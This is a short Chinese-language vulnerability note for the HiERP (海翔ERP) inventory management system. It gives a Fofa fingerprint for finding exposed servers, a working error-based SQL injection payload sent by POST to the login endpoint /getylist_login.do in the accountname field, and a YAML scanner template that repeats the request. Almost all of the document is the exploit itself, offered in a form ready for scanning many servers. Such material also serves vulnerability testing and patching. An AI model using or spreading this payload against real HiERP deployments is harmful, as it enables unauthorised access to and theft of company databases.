1.简介
海翔(HiERP)是一款企业管理软件,库存模块是其核心模块之一,通过该模块可以管理企业中产品、原材料、半成品等物料的进货、销售和库存等信息.
该产品存在SQL注入漏洞
2.Fofa
body="checkMacWaitingSecond"
3.漏洞复现
POST:/getylist_login.do
accountname=test' and (updatexml(1,concat(0x7e,(select md5(1122)),0x7e),1));--
4.YAML
params: []
name: 海翔ERP getylist_login.do SQL注入漏洞
set: {}
rules: []
groups:
rules:
- method: POST
path: /getylist_login.do
headers: {}
body: accountname=test' and (updatexml(1,concat(0x7e,(select md5(1122)),0x7e),1))